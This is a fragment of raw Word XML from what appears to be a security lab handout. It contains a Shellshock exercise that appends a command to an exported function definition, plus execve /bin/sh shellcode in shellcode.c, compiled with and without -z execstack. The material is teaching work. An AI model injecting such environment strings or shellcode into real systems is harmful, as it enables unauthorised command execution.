        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE2FE1">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E573E7" w14:textId="67EA5C82" w:rsidR="006F7A9F" w:rsidRDefault="00CE381D" w:rsidP="003D7ECE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>Change the function information</w:t>
      </w:r>
      <w:r w:rsidR="00336ABC">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> and re-define this shell function </w:t>
      </w:r>
      <w:r w:rsidR="00336ABC" w:rsidRPr="00336ABC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>foo</w:t>
      </w:r>
      <w:r w:rsidR="00336ABC">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> using environment variable method</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050B5664" w14:textId="02A8AD77" w:rsidR="00CE381D" w:rsidRPr="00CE381D" w:rsidRDefault="00CE381D" w:rsidP="00927DE7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/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</w:t>
      </w:r>
      <w:r w:rsidR="00AC424D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE381D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>oo</w:t>
      </w:r>
      <w:r w:rsidR="00927DE7">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_Hlk84361298"/>
      <w:r w:rsidR="00927DE7" w:rsidRPr="000A25F4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidR="00927DE7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">() { </w:t>
      </w:r>
      <w:r w:rsidRPr="006C7B2A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">echo </w:t>
      </w:r>
      <w:r w:rsidRPr="00E4148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firstname</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4148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;</w:t>
      </w:r>
      <w:r w:rsidR="00927DE7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> };</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00336ABC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00927DE7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:r w:rsidR="00CA4FFF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>/bin/</w:t>
      </w:r>
      <w:r w:rsidR="005E2377">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>cal</w:t>
      </w:r>
      <w:r w:rsidR="00450096">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidR="00927DE7" w:rsidRPr="000A25F4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AAB9A9" w14:textId="3BB3546D" w:rsidR="00DE2DC2" w:rsidRPr="00346854" w:rsidRDefault="00336ABC" w:rsidP="00346854">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/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>R</w:t>
      </w:r>
      <w:r w:rsidR="00450096">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve">un </w:t>
      </w:r>
      <w:r w:rsidR="00450096" w:rsidRPr="00346854">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>export foo</w:t>
      </w:r>
      <w:r w:rsidR="00450096">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> command to pass the shell variable to the child process. After that, run </w:t>
      </w:r>
      <w:r w:rsidR="00450096" w:rsidRPr="00346854">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>bash_shellshock</w:t>
      </w:r>
      <w:r w:rsidR="005423B0" w:rsidRPr="005423B0">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> again</w:t>
      </w:r>
      <w:r w:rsidR="00450096">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>. Describe your observation, and explain why</w:t>
      </w:r>
      <w:r w:rsidR="00346854">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005423B0">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>that</w:t>
      </w:r>
      <w:r w:rsidR="00346854">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> happens. </w:t>
      </w:r>
      <w:r w:rsidR="006F7A9F" w:rsidRPr="00346854">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F22209" w:rsidRPr="00346854">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C481AE" w14:textId="739849D2" w:rsidR="00093140" w:rsidRPr="002C2204" w:rsidRDefault="002C2204" w:rsidP="002C2204">
      <w:pPr>
        <w:spacing w:before="240" w:after="240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2.2 </w:t>
      </w:r>
      <w:r w:rsidR="00093140" w:rsidRPr="002C2204">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Task 2: </w:t>
      </w:r>
      <w:r w:rsidR="00061DBB">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Turning off countermeasures and running shellcode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD5D202" w14:textId="3C131B67" w:rsidR="00925D8E" w:rsidRDefault="00BF2828" w:rsidP="000402FC">
      <w:p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Before starting the buffer overflow attack, let us turn off the countermeasures and get familiar with t</w:t>
      </w:r>
      <w:r w:rsidR="00E2337C">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>he shellcode.</w:t>
      </w:r>
      <w:r w:rsidR="00CF2039">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B363AE" w:rsidRPr="00B363AE">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>A shellcode is the</w:t>
      </w:r>
      <w:r w:rsidR="001B1308">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> binary</w:t>
      </w:r>
      <w:r w:rsidR="00B363AE" w:rsidRPr="00B363AE">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> code to launch a shell</w:t>
      </w:r>
      <w:r w:rsidR="001B1308">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> program</w:t>
      </w:r>
      <w:r w:rsidR="00B363AE" w:rsidRPr="00B363AE">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>. It has to be loaded into the memory so that we can force the vulnerable program to jump to it</w:t>
      </w:r>
      <w:r w:rsidR="00C14391">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> for direct execution</w:t>
      </w:r>
      <w:r w:rsidR="00B363AE" w:rsidRPr="00B363AE">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0601F086" w14:textId="4FA44D72" w:rsidR="008272F4" w:rsidRPr="00485036" w:rsidRDefault="00302D0E" w:rsidP="00FA2A88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A8DCBEF" wp14:editId="5FC70A28">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>274955</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5943600" cy="1666875"/>
                <wp:effectExtent l="0" t="0" r="19050" b="28575"/>
                <wp:wrapTight wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="21723"/>
                    <wp:lineTo x="21600" y="21723"/>
                    <wp:lineTo x="21600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66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C8E51" w14:textId="1E8000B3" w:rsidR="00EA5D8C" w:rsidRPr="00194DBE" w:rsidRDefault="00EA5D8C" w:rsidP="008272F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/* shellcode.c */</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="151F1AFA" w14:textId="2B3C3D68" w:rsidR="008272F4" w:rsidRPr="00194DBE" w:rsidRDefault="008272F4" w:rsidP="008272F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#include &lt;</w:t>
                            </w:r>
                            <w:r w:rsidR="00262057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string</w:t>
                            </w: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.h&gt;</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="6395D0AD" w14:textId="67A1FCA1" w:rsidR="000972E4" w:rsidRPr="00194DBE" w:rsidRDefault="000A3BDE" w:rsidP="008272F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</w:t>
                            </w:r>
                            <w:r w:rsidR="000972E4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onst char code[] = "\x31\xc0\x50\x68//sh\x68/bin</w:t>
                            </w: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\x89\xe3\x50</w:t>
                            </w:r>
                            <w:r w:rsidR="000972E4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"</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="38CBBBA1" w14:textId="39BA3812" w:rsidR="000A3BDE" w:rsidRPr="00194DBE" w:rsidRDefault="000A3BDE" w:rsidP="008272F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      "</w:t>
                            </w:r>
                            <w:r w:rsidR="00631633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\x53\x89\xe1\x99\xb0\x0b\xcd\x80</w:t>
                            </w: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"</w:t>
                            </w:r>
                            <w:r w:rsidR="00631633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55A9BEB" w14:textId="77777777" w:rsidR="008272F4" w:rsidRPr="00194DBE" w:rsidRDefault="008272F4" w:rsidP="008272F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int main()</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="601C81ED" w14:textId="77777777" w:rsidR="008272F4" w:rsidRPr="00194DBE" w:rsidRDefault="008272F4" w:rsidP="008272F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40B14F18" w14:textId="1682D67D" w:rsidR="008272F4" w:rsidRPr="00194DBE" w:rsidRDefault="008272F4" w:rsidP="008272F4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char </w:t>
                            </w:r>
                            <w:r w:rsidR="00953098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buffer</w:t>
                            </w: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[</w:t>
                            </w:r>
                            <w:r w:rsidR="00953098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sizeof(code)</w:t>
                            </w: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];</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="6D341811" w14:textId="1C5BE849" w:rsidR="008272F4" w:rsidRPr="00194DBE" w:rsidRDefault="00953098" w:rsidP="008272F4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strcpy(buffer, code)</w:t>
                            </w:r>
                            <w:r w:rsidR="008272F4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28C47E7" w14:textId="6019FE11" w:rsidR="008272F4" w:rsidRPr="00194DBE" w:rsidRDefault="00953098" w:rsidP="008272F4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((void</w:t>
                            </w:r>
                            <w:r w:rsidR="00DF78D2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</w:t>
                            </w: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*</w:t>
                            </w:r>
                            <w:r w:rsidR="00DF78D2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</w:t>
                            </w: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 ))buffer</w:t>
                            </w:r>
                            <w:r w:rsidR="004E018E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</w:t>
                            </w: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 )</w:t>
                            </w:r>
                            <w:r w:rsidR="008272F4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;</w:t>
                            </w:r>
                            <w:r w:rsidR="00612EEE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//Execute the shellcode</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="0CC40AA4" w14:textId="77777777" w:rsidR="008272F4" w:rsidRPr="00194DBE" w:rsidRDefault="008272F4" w:rsidP="008272F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DCBE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21.65pt;width:468pt;height:131.25pt;z-index:-251640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" fillcolor="#e7e6e6 [3214]" strokeweight=".5pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="410C8E51" w14:textId="1E8000B3" w:rsidR="00EA5D8C" w:rsidRPr="00194DBE" w:rsidRDefault="00EA5D8C" w:rsidP="008272F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/* </w:t>
                      </w:r>
                      <w:proofErr w:type="spell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shellcode.c</w:t>
                      </w:r>
                      <w:proofErr w:type="spell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*/</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="151F1AFA" w14:textId="2B3C3D68" w:rsidR="008272F4" w:rsidRPr="00194DBE" w:rsidRDefault="008272F4" w:rsidP="008272F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#include &lt;</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidR="00262057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string</w:t>
                      </w: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.h</w:t>
                      </w:r>
                      <w:proofErr w:type="spell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&gt;</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="6395D0AD" w14:textId="67A1FCA1" w:rsidR="000972E4" w:rsidRPr="00194DBE" w:rsidRDefault="000A3BDE" w:rsidP="008272F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</w:t>
                      </w:r>
                      <w:r w:rsidR="000972E4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onst char </w:t>
                      </w:r>
                      <w:proofErr w:type="gramStart"/>
                      <w:r w:rsidR="000972E4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code[</w:t>
                      </w:r>
                      <w:proofErr w:type="gramEnd"/>
                      <w:r w:rsidR="000972E4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= "\x31\xc0\x50\x68//</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidR="000972E4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sh</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidR="000972E4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\x68/bin</w:t>
                      </w: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\x89\xe3\x50</w:t>
                      </w:r>
                      <w:r w:rsidR="000972E4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"</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="38CBBBA1" w14:textId="39BA3812" w:rsidR="000A3BDE" w:rsidRPr="00194DBE" w:rsidRDefault="000A3BDE" w:rsidP="008272F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      "</w:t>
                      </w:r>
                      <w:r w:rsidR="00631633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\x53\x89\xe1\x99\xb0\x0b\</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidR="00631633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xcd</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidR="00631633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\x80</w:t>
                      </w:r>
                      <w:proofErr w:type="gram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"</w:t>
                      </w:r>
                      <w:r w:rsidR="00631633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;</w:t>
                      </w:r>
                      <w:proofErr w:type="gramEnd"/>
                    </w:p>
                    <w:p w14:paraId="655A9BEB" w14:textId="77777777" w:rsidR="008272F4" w:rsidRPr="00194DBE" w:rsidRDefault="008272F4" w:rsidP="008272F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int </w:t>
                      </w:r>
                      <w:proofErr w:type="gram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main(</w:t>
                      </w:r>
                      <w:proofErr w:type="gram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</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="601C81ED" w14:textId="77777777" w:rsidR="008272F4" w:rsidRPr="00194DBE" w:rsidRDefault="008272F4" w:rsidP="008272F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14:paraId="40B14F18" w14:textId="1682D67D" w:rsidR="008272F4" w:rsidRPr="00194DBE" w:rsidRDefault="008272F4" w:rsidP="008272F4">
                      <w:pPr>
                        <w:ind w:firstLine="58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char </w:t>
                      </w:r>
                      <w:r w:rsidR="00953098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buffer</w:t>
                      </w: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[</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidR="00953098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sizeof</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidR="00953098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(code)</w:t>
                      </w:r>
                      <w:proofErr w:type="gram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];</w:t>
                      </w:r>
                      <w:proofErr w:type="gramEnd"/>
                    </w:p>
                    <w:p w14:paraId="6D341811" w14:textId="1C5BE849" w:rsidR="008272F4" w:rsidRPr="00194DBE" w:rsidRDefault="00953098" w:rsidP="008272F4">
                      <w:pPr>
                        <w:ind w:firstLine="58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strcpy</w:t>
                      </w:r>
                      <w:proofErr w:type="spell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buffer, code)</w:t>
                      </w:r>
                      <w:r w:rsidR="008272F4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;</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="028C47E7" w14:textId="6019FE11" w:rsidR="008272F4" w:rsidRPr="00194DBE" w:rsidRDefault="00953098" w:rsidP="008272F4">
                      <w:pPr>
                        <w:ind w:firstLine="58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((</w:t>
                      </w:r>
                      <w:proofErr w:type="gram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void</w:t>
                      </w:r>
                      <w:r w:rsidR="00DF78D2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*</w:t>
                      </w:r>
                      <w:r w:rsidR="00DF78D2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</w:t>
                      </w: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 ))buffer</w:t>
                      </w:r>
                      <w:r w:rsidR="004E018E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</w:t>
                      </w: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 )</w:t>
                      </w:r>
                      <w:r w:rsidR="008272F4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;</w:t>
                      </w:r>
                      <w:r w:rsidR="00612EEE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//Execute the shellcode</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="0CC40AA4" w14:textId="77777777" w:rsidR="008272F4" w:rsidRPr="00194DBE" w:rsidRDefault="008272F4" w:rsidP="008272F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F64B6" w:rsidRPr="005F64B6">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve">The following </w:t>
      </w:r>
      <w:r w:rsidR="00E4192C">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008272F4" w:rsidRPr="005F64B6">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>shows how to launch a shell</w:t>
      </w:r>
      <w:r w:rsidR="00E4192C">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008272F4" w:rsidRPr="005F64B6">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>by executing a shellcode stored in a buffer</w:t>
      </w:r>
      <w:r w:rsidR="008272F4">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A7548B" w14:textId="050944E2" w:rsidR="004848C7" w:rsidRDefault="008F1BBE" w:rsidP="006D10F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr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 xml:space="preserve">Compile the above code </w:t>
      </w:r>
      <w:r w:rsidRPr="008F1BBE">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>shellcode.c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>shellcode</w:t>
      </w:r>
      <w:r w:rsidR="00AC1622">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> using the </w:t>
      </w:r>
      <w:r w:rsidR="00AC1622" w:rsidRPr="000F5C77">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>gcc</w:t>
      </w:r>
      <w:r w:rsidR="00AC1622">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313921A6" w14:textId="50C8A8B4" w:rsidR="00AC1622" w:rsidRPr="007A05B1" w:rsidRDefault="00AC1622" w:rsidP="00E820A5">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A05B1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>gcc</w:t>
      </w:r>
      <w:r w:rsidR="005E5C97" w:rsidRPr="007A05B1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> -z execstack</w:t>
      </w:r>
      <w:r w:rsidRPr="007A05B1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> shellcode.c -o shellcode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08EA96FA" w14:textId="29911F0A" w:rsidR="005E5C97" w:rsidRDefault="007A05B1" w:rsidP="00D97A83">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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Run the program </w:t>
      </w:r>
      <w:r w:rsidRPr="007A05B1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>shellcode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="000F5C77">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>Describe your observation. Explain why we need</w:t>
      </w:r>
      <w:r w:rsidR="00543B10">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> to</w:t>
      </w:r>
      <w:r w:rsidR="000F5C77">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> add </w:t>
      </w:r>
      <w:r w:rsidR="000F5C77" w:rsidRPr="000F5C77">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>gcc</w:t>
      </w:r>
      <w:r w:rsidR="000F5C77">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> option </w:t>
      </w:r>
      <w:r w:rsidR="000F5C77" w:rsidRPr="000F5C77">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>-z execstack</w:t>
      </w:r>
      <w:r w:rsidR="000F5C77">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> here.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75AB8100" w14:textId="7B2FA5D1" w:rsidR="006C08E1" w:rsidRDefault="007078FD" w:rsidP="006C08E1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>R</w:t>
      </w:r>
      <w:r w:rsidR="006C08E1">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve">emove </w:t>
      </w:r>
      <w:r w:rsidR="006C08E1" w:rsidRPr="000F5C77">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>-z execstack</w:t>
      </w:r>
      <w:r w:rsidR="006C08E1">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve">, and then recompile the code </w:t>
      </w:r>
      <w:r w:rsidR="006C08E1" w:rsidRPr="008F1BBE">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>shellcode.c</w:t>
      </w:r>
      <w:r w:rsidR="006C08E1">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidR="006C08E1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>shellcode</w:t>
      </w:r>
      <w:r w:rsidR="006C08E1">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> using the </w:t>
      </w:r>
      <w:r w:rsidR="006C08E1" w:rsidRPr="000F5C77">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>gcc</w:t>
      </w:r>
      <w:r w:rsidR="006C08E1">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFC2B63" w14:textId="23BC9168" w:rsidR="006C08E1" w:rsidRDefault="006C08E1" w:rsidP="00E820A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A05B1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>gcc shellcode.c -o shellcode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263AB1B6" w14:textId="21C83ACC" w:rsidR="006C08E1" w:rsidRDefault="006C08E1" w:rsidP="002A5867">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/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Run the program </w:t>
      </w:r>
      <w:r w:rsidRPr="007A05B1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>shellcode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve">. Describe your observation. Explain why </w:t>
      </w:r>
      <w:r w:rsidR="00DF068B">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>that</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> happens.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632602BE" w14:textId="68527FDF" w:rsidR="004C7EA6" w:rsidRPr="00557694" w:rsidRDefault="005243C7" w:rsidP="0055769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595785" wp14:editId="6A871A09">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>left</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>306070</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5943600" cy="1685925"/>
                <wp:effectExtent l="0" t="0" r="19050" b="28575"/>
                <wp:wrapTight wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
